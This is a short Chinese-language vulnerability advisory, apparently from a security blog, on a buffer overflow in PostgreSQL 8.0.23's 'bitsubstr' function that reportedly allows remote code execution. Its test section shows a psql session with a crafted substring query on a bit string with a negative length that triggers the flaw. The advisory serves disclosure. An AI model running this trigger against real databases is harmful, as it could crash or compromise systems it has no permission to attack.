PostgreSQL ‘bitsubstr’缓冲区溢出漏洞

漏洞起因
边界条件错误
危险等级

 
影响系统
PostgreSQL 8.0.23
 
不受影响系统
 
危害
远程攻击者可以利用漏洞执行任意代码。
 
攻击所需条件
攻击者必须访问PostgreSQL。
 
漏洞信息
PostgreSQL是一款对象关系型数据库管理系统,支持扩展的SQL标准子集。
PostgreSQL ‘bitsubstr’函数存在缓冲区溢出,远程攻击者可以利用漏洞执行任意代码。
 
测试方法
$ psql -U postgres testdb
testdb=# select version();
version
————————————————————————————–
PostgreSQL 8.0.23 on i686-pc-linux-gnu, compiled by GCC gcc (Debian 4.3.2-1.1) 4.3.2
(1 row)
testdb=# select substring(B’101010101010101010101010101010101010
10101010101′,33,-15);
 
厂商解决方案
目前没有详细解决方案提供:
http://www.postgresql.org/
 
漏洞提供者
Intevydis

发表评论?

0 条评论。

发表评论